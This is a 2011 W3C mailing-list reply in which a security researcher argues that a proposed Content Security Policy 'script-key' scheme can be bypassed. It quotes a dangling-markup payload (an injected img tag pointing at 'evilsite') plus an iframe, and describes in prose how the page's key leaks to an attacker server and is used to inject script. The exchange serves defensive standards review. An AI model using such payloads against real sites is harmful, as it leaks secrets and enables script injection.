Re: [Content Security Policy] Proposal to move the debate forward

From: gaz Heyes <gazheyes@gmail.com>
Date: Fri, 28 Jan 2011 11:07:33 +0000
Message-ID: <AANLkTikykQVP1Dw1d1LKo80awFTeH=2x3dFhVs3xiMGn@mail.gmail.com>
To: Gervase Markham <gerv@mozilla.org>
Cc: Brandon Sterne <bsterne@mozilla.com>, public-web-security@w3.org
On 28 January 2011 11:04, Gervase Markham <gerv@mozilla.org> wrote:

> On 28/01/11 10:54, gaz Heyes wrote:
>
>> You want an automatic attack? Ok. I'm really clueless as to why you don't
>> get this. I said there are many ways. <img src='//evilsite?token please=
>> Initiated by a <iframe src="//cspsite?injection=<img
>> src='//evilsite?token please=" onload="setTimeout(function(){
>> readKey();doJSInjection(); }, 10000)"></iframe>
>>
>
> Still don't get it, sorry :-( If you inject the <img src= etc. into the CSP
> site using script-key, your onload won't run because it doesn't have the
> script-key in the script text.
>
> You need the key to run any script in the page context. _Any_ script -
> event handlers, in-page, external. Apart from your suggestion of managing to
> get a form submitted with a chunk of page HTML in the form data, then you
> need script to get the key. Catch 22.
>

Hehe, I thought you were being awkward. Ok, the iframe isn't injected; it
serves to read the data that is injected. So the img injection sends the
data from the page up to the next single quote (including the script key) to
our evil server; the evil server then reads the script key and sends it back
to the iframe, and the iframe then injects JavaScript with a valid key. The
iframe is outside of the target site itself.
Received on Friday, 28 January 2011 11:08:05 GMT